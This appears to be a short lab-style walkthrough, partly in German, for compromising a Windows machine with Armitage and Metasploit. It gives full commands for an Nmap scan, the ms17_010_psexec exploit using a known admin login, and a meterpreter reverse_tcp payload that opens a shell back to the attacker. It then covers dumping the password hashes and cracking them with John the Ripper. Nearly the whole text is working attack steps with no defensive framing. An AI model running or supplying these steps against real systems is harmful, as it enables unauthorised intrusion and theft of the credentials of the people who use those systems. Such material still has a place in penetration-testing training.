armitage

start with: armitage (accept IP an Port)
Next, you will connect to the victim’s system. To do this, click Hosts, select Nmap Scan and then select Quick Scan.

Insert Target-IP, press ok and wait for the end of the scan. You will see the Target in the upper screen Next, you will prepare and launch the PsExec exploit. To do this, click Attacks and select Find Attacks.

Wait for „Happy Hunting“ and klick ok

You will now use the PsExec exploit. To do this, type the following command:

use exploit/windows/smb/ms17_010_psexec
  set RHOST 192.168.0.5
  set LPORT 4444

Now, you need to set the payload. Type the following command:

set payload windows/x64/meterpreter/reverse_tcp
  set SMBUser admin  -> ein bekanter User
  set SMBPass Passw0rd  -> und sein Passwort
  set VerifyTarget false
run

Right-click the System icon, select Meterpreter 1, select Interact, and then select Meterpreter Shell.

Notice that a new tab with the name Meterpreter 1 is now opened in the bottom pane. →x use it

run post/windows/gather/hashdump

You will see all users Hashes. Copy all Hashes-lines includet user:*** in a *.txt-File Now try to hack the Hash with John. You need:

• the file with the Hashes (hashes.txt)
• a Password-Wordlist (pass.txt) see: https://wiki.skullsecurity.org/index.php/Passwords

Use John:

john --wordlist=/root/Desktop/pass.txt --format=NT /root/Desktop/hashes.txt